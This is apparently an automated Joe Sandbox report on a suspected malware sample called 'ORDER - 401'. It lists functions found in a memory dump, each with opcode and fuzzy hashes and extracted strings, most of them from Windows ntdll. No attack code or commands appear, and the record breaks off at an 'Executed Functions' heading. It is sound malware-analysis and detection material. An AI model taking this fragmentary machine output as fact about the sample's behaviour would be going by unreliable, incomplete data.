                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3f2f46f0f8308a8868351e7c734fddbbe0cb7e336142399aefa5d69b5727b1b9
                                                                                  • Instruction ID: 7fca6659b367a6ee7446366eb1f76f5e7adb3d14f7d847c53a947cbfff056f35
                                                                                  • Opcode Fuzzy Hash: 3f2f46f0f8308a8868351e7c734fddbbe0cb7e336142399aefa5d69b5727b1b9
                                                                                  • Instruction Fuzzy Hash: 029002B134150442E10071588414B0A0009D7E1301F55C016E5464554DC619CD526226
                                                                                  Function 01052F60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca758f27dedf2bce72fdb0c57be8c69368094b2098cd4ecad12c809c80403b1
                                                                                  • Instruction ID: 03a2359c513e1a26bd47f21447d2f41f7fb50863fdfafa01b92e3e9553544ace
                                                                                  • Opcode Fuzzy Hash: 0ca758f27dedf2bce72fdb0c57be8c69368094b2098cd4ecad12c809c80403b1
                                                                                  • Instruction Fuzzy Hash: 7B9002B121150042E1047158840470A004997E1201F55C013A6554554CC5298D615225
                                                                                  Function 01052F90 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0bdb6e9b4bd7b32bc08dfe5ebfc9fdc5a9ef3f495b37e0e4a1f9de5a1e7b295
                                                                                  • Instruction ID: 5b8b03bc78adfb338b2b8f19f8f0b6b6e83363296fa40ef6995472154d5ab60f
                                                                                  • Opcode Fuzzy Hash: e0bdb6e9b4bd7b32bc08dfe5ebfc9fdc5a9ef3f495b37e0e4a1f9de5a1e7b295
                                                                                  • Instruction Fuzzy Hash: 7E90027120190402E1007158881470F000997D0302F55C012A5564555DC62589516671
                                                                                  Function 01052FA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df1b110b4839e9bd82ccd43e9a22a3e64b1acb6cfa18977f56c89ae0ec9fd395
                                                                                  • Instruction ID: c7c418eb369f1be9c41a72909f4c1c00ab4abbb7796749fd2b5f54e52109f4ec
                                                                                  • Opcode Fuzzy Hash: df1b110b4839e9bd82ccd43e9a22a3e64b1acb6cfa18977f56c89ae0ec9fd395
                                                                                  • Instruction Fuzzy Hash: F090027120190402E1007158880874B000997D0302F55C012A9564555EC665C9916631
                                                                                  Function 01052FB0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5ebb583bf2edbb2f843a71de5a43c9878127d58d79ae3d27cb5d8949d324b344
                                                                                  • Instruction ID: f9cc133bee22df821f5fe74c7adcaf13b401ff4068c14c5eea3df5142f20af33
                                                                                  • Opcode Fuzzy Hash: 5ebb583bf2edbb2f843a71de5a43c9878127d58d79ae3d27cb5d8949d324b344
                                                                                  • Instruction Fuzzy Hash: 969002716015004251407168C84490A4009BBE1211755C122A4D98550DC55989655765
                                                                                  Function 01052FE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a387aaed75821d8411c6bf5f842091c66321bd5438ed3fecc0977fc6bd73e4ea
                                                                                  • Instruction ID: 46afabbbffa8542952ca8e7d48c98e42504b47ceb1c3fba4b2100e1b7120d6f7
                                                                                  • Opcode Fuzzy Hash: a387aaed75821d8411c6bf5f842091c66321bd5438ed3fecc0977fc6bd73e4ea
                                                                                  • Instruction Fuzzy Hash: 40900271211D0042E20075688C14B0B000997D0303F55C116A4554554CC91589615621
                                                                                  Function 01052E30 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0c3151198b4effa99f9213012c697708e22340aeee2a85502b194e34ae3afbc9
                                                                                  • Instruction ID: a7683768bb6a9006238237fea279f17c8d2b173909ccd7f03289016a8e7f6731
                                                                                  • Opcode Fuzzy Hash: 0c3151198b4effa99f9213012c697708e22340aeee2a85502b194e34ae3afbc9
                                                                                  • Instruction Fuzzy Hash: 4990027130150402E1027158841460A000DD7D1345F95C013E5824555DC6258A53A232
                                                                                  Function 01052E80 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a630ac4a34efef23ece344c20bf39a9a8300336eae05392d64cbaa5082ba0651
                                                                                  • Instruction ID: 67defe485e706a8be5cfe6c3743a9dc48abb3f2a56e881539c8ca8ec5890096b
                                                                                  • Opcode Fuzzy Hash: a630ac4a34efef23ece344c20bf39a9a8300336eae05392d64cbaa5082ba0651
                                                                                  • Instruction Fuzzy Hash: 2990027160150502E1017158840461A000E97D0241F95C023A5424555ECA258A92A231
                                                                                  Function 01052EA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c2c0a9139429adfb9012ed64c69cafe6465142fd632dd9d8ed238e24f6cf5d7
                                                                                  • Instruction ID: 3a8eb4c79a72fc923214b51eb8c9e02ccbef891ea48c89688a234ffd6993b09c
                                                                                  • Opcode Fuzzy Hash: 2c2c0a9139429adfb9012ed64c69cafe6465142fd632dd9d8ed238e24f6cf5d7
                                                                                  • Instruction Fuzzy Hash: 089002B120150402E1407158840474A000997D0301F55C012A9464554EC6598ED56765
                                                                                  Function 01052EE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3f0adc25d6d5501b67c803add2d62a027acd6202f9bfea567368218ddd8654c1
                                                                                  • Instruction ID: 9bc7cc828c9897d2d202e2d6c0432172489709acd94cdba94e1ec14d2461d329
                                                                                  • Opcode Fuzzy Hash: 3f0adc25d6d5501b67c803add2d62a027acd6202f9bfea567368218ddd8654c1
                                                                                  • Instruction Fuzzy Hash: D69002B120190403E1407558880460B000997D0302F55C012A6464555ECA298D516235
                                                                                  Function 01053010 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d32df696e8c8b778cb6844151e6b4bc4ce7c25fedeae519a9193adfb6a4b6ea8
                                                                                  • Instruction ID: 9ae46e4e97adf0c2a2cf1ce69be1ac62e425e2485f603d773107359479de9b16
                                                                                  • Opcode Fuzzy Hash: d32df696e8c8b778cb6844151e6b4bc4ce7c25fedeae519a9193adfb6a4b6ea8
                                                                                  • Instruction Fuzzy Hash: 6E90027120194442E14072588804B0F410997E1202F95C01AA8556554CC91589555721
                                                                                  Function 01053090 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf251966f604eb8e92cbff55e1db0a6d9f61425042e42a2aa20e4998eee3b785
                                                                                  • Instruction ID: d01ae65ae63c6af6ac77a8f10d2bcb7ac44112c97359fbdf21f24afa14b53bed
                                                                                  • Opcode Fuzzy Hash: bf251966f604eb8e92cbff55e1db0a6d9f61425042e42a2aa20e4998eee3b785
                                                                                  • Instruction Fuzzy Hash: CD90027124150802E1407158C41470B000AD7D0601F55C012A4424554DC6168A6567B1
                                                                                  Function 010539B0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bcca58dd4867f52920c7683302518a905a8af1813c21552ccea3519418ab9d25
                                                                                  • Instruction ID: c0fb05640975eecfda7fc1c159ca0f7bd7e636ba113a0a80ff3b7d7d17b5cc1c
                                                                                  • Opcode Fuzzy Hash: bcca58dd4867f52920c7683302518a905a8af1813c21552ccea3519418ab9d25
                                                                                  • Instruction Fuzzy Hash: AB90027124555102E150715C840461A4009B7E0201F55C022A4C14594DC55589556321
                                                                                  Function 01053D10 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd64848e173b5c8ca6b1f296cb995fd0299dfe218a1b7aee9ea3909155d388c7
                                                                                  • Instruction ID: 1a009a256bdf55b55a4032c4a797d773b03a9db1c56c5083040b545c4b78e7d4
                                                                                  • Opcode Fuzzy Hash: cd64848e173b5c8ca6b1f296cb995fd0299dfe218a1b7aee9ea3909155d388c7
                                                                                  • Instruction Fuzzy Hash: 4590027120250142A54072589804A4E410997E1302B95D416A4415554CC91489615321
                                                                                  Function 01053D70 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab98c497880f20fdf507b249eefee18aac7a3e331b8ba6352760e10a94d4be23
                                                                                  • Instruction ID: 2b118a78b96e040527f6c032fe57d9f486026a0916d23c2f0e070ef2680a8dbe
                                                                                  • Opcode Fuzzy Hash: ab98c497880f20fdf507b249eefee18aac7a3e331b8ba6352760e10a94d4be23
                                                                                  • Instruction Fuzzy Hash: F590027520150402E5107158980464A004A97D0301F55D412A4824558DC65489A1A221
                                                                                  Function 01052C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 3e2ddbdefb5aa0b57140d7b0c123a94501964644292d3249d70f367482ffad41
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 01052890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
                                                                                  • Instruction ID: 0a2599ca3d280801e8494a088ba5bddecf481767e5b86a5b93612f4e820edf82
                                                                                  • Opcode Fuzzy Hash: fbceef533d96b5961c919fe22241f5c8683d2c17de1d921c97dd31d454a45974
                                                                                  • Instruction Fuzzy Hash: 3951C5B5A04156FEDB61DB9C899097FFBF8BF08240B14816AF8E5D7641D334DE408BA0
                                                                                  Function 010C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
                                                                                  • Instruction ID: 589714183ab9518764b3953240c9fa6b079dcc0baa3b78d5beccd7f24751f0c8
                                                                                  • Opcode Fuzzy Hash: 240a5dfcdc3c0954ff228d9115e54da4c79f2ba40ecc57db69c425c607fe69ee
                                                                                  • Instruction Fuzzy Hash: 0E511671A00646AFDB31DF5CC89097FFBF8EF54600B04849EE4D6C7A81EA74DA408B60
                                                                                  Function 01047630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01084725
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01084787
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01084742
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010846FC
                                                                                  • Execute=1, xrefs: 01084713
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01084655
                                                                                  • ExecuteOptions, xrefs: 010846A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 840e4efc46e9cb8247ece8e5ae029ac872e38bd99b8cece7ff85620e680d99e7
                                                                                  • Instruction ID: 780569b5fd0f5df4330dd84bf42aed6fab844786909fe9ceba9efe0a55c03e98
                                                                                  • Opcode Fuzzy Hash: 840e4efc46e9cb8247ece8e5ae029ac872e38bd99b8cece7ff85620e680d99e7
                                                                                  • Instruction Fuzzy Hash: E951197160021AABEF21EAA8DCD5BEE7BA9FF18300F4400F9D685E7191D7709A458B51
                                                                                  Function 0105B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: d3ee3652ce7fee8a29063ce5a16d0b72b868d7cbd5946a53e43803930f9d0269
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 7181AF70A052499EEFA58E6CC8917FFBBE3BF45320F184199DCE1A7291C734A941CB61
                                                                                  Function 010C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 95b695dfa1d46c7b56c2e7d4746fb02ff7a1cf21f8784ac60a5c672498d4b734
                                                                                  • Instruction ID: 572b99df5dc43cc6ab6ca9874adf24f61dd9b76e7c4ea39a16b5471bb8c9549e
                                                                                  • Opcode Fuzzy Hash: 95b695dfa1d46c7b56c2e7d4746fb02ff7a1cf21f8784ac60a5c672498d4b734
                                                                                  • Instruction Fuzzy Hash: 6021657AA00119ABDB51DF79CC50AFE7BF8EFA4A44F04016AED85D7640E730D9418BA1
                                                                                  Function 0103F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010802BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010802E7
                                                                                  • RTL: Re-Waiting, xrefs: 0108031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 53734ad1d0e546a46334849a58034d2e9ae1f454071d4e032b813baebdae969c
                                                                                  • Instruction ID: 53f5e7970a479f3a71f7034641deab5d4e688987786d0a6b73dabf26c02a3c69
                                                                                  • Opcode Fuzzy Hash: 53734ad1d0e546a46334849a58034d2e9ae1f454071d4e032b813baebdae969c
                                                                                  • Instruction Fuzzy Hash: E9E19F30A087429FD765DF28C884B6ABBE4BB88314F144A99F5E58B2E1D774D845CB42
                                                                                  Function 0104BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 01087B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01087B7F
                                                                                  • RTL: Re-Waiting, xrefs: 01087BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 1938398437a61d8de83323b5e3efccd64a47df165cd1c0d12066cae665f5bd63
                                                                                  • Instruction ID: 15f0480d8d1299f8733e6cec6dea0b263a4d9239e5b0a066d4b7c64b498b4816
                                                                                  • Opcode Fuzzy Hash: 1938398437a61d8de83323b5e3efccd64a47df165cd1c0d12066cae665f5bd63
                                                                                  • Instruction Fuzzy Hash: 0D41F4717047029FD720DE29C880B6BB7E5EF98710F100A6DFADAD7281DB72E8058B91
                                                                                  Function 0104B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0108728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 010872A3
                                                                                  • RTL: Re-Waiting, xrefs: 010872C1
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01087294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 5b19a2441096f3c7cf7cf7ca183a98b5d175f4f6d3a03ff69c586f785023b0c6
                                                                                  • Instruction ID: 4152c02b3b06797a4af43f8c6a6d37c01bafd26e723b4fd119ba9e04d2ef2f88
                                                                                  • Opcode Fuzzy Hash: 5b19a2441096f3c7cf7cf7ca183a98b5d175f4f6d3a03ff69c586f785023b0c6
                                                                                  • Instruction Fuzzy Hash: F241E571704206ABDB21EE29CC81B6ABBE5FF94710F200669F9D5D7280DB31E852C7D1
                                                                                  Function 010C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: e761b19a0697b0175db516553d0f3b7ac6e21c7ec63aa112cc952a867d03bb55
                                                                                  • Instruction ID: 5e5750b860671e0c3026799540258f902eed41b70748a5da6cc9002b0dff9f69
                                                                                  • Opcode Fuzzy Hash: e761b19a0697b0175db516553d0f3b7ac6e21c7ec63aa112cc952a867d03bb55
                                                                                  • Instruction Fuzzy Hash: 97316672A002199FDB61DF2DCC40BEFB7F8FB54610F45459AE989E7240EB309A548FA0
                                                                                  Function 01057D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 83388e941ce02e613d8def00e68f4174c4833f46683990b6d92e5ede3cdda96a
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 5591A071E0021A9AEFE4DF6DC880ABFBBE5EF44320F94455AED95A72C0D7308940A761
                                                                                  Function 01019126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 7ba233cf00ee4fd0bc57f80aa78ca07222cae8f3ebadaac9e60dfe3291b772de
                                                                                  • Instruction ID: 33b77a8b16bcc11ba5938c5049fbc788d818ece7601bca2d86ff0a84972e0eed
                                                                                  • Opcode Fuzzy Hash: 7ba233cf00ee4fd0bc57f80aa78ca07222cae8f3ebadaac9e60dfe3291b772de
                                                                                  • Instruction Fuzzy Hash: 51812C71D002699BDB35DB54CC44BEEB7B8AF48754F0041EAEA59B7280D7709E84CFA4

                                                                                  Executed Functions

                                                                                  Function 027D1C4C Relevance: 43.1, Strings: 34, Instructions: 569COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
